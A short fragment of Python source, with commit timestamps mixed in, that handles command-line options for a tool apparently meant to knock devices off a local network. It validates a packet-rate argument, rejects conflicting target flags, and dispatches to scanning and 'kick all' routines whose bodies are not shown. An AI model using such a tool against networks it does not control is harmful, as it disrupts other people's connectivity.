2018-02-05 20:39:08 +01:00
if (options.packets is not None and (options.packets).isdigit()) or options.packets is None:
pass
else:
print("\n{}ERROR: Argument for number of packets broadcasted per minute must be an integer {}(e.g. {}--packet 60{}).\n".format(RED, END, BLUE, END))
os._exit(1)
if options.targets is None and options.kick_all is False:
2018-02-05 20:39:08 +01:00
# set to interactive attack
interactive = True
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
elif options.targets is None and options.kick_all is True:
# set to non-interactive attack
interactive = False
kickalloff()
os._exit(0)
elif options.targets is not None and options.kick_all is True:
print("\n{}ERROR: Cannot use both {}-a/--kick-all{} and {}-t/--target{} flags in one command.{}\n".format(RED, BLUE, RED, BLUE, RED, END))
os._exit(1)
2018-02-05 20:39:08 +01:00
else:
# set to non-interactive attack
interactive = False
main()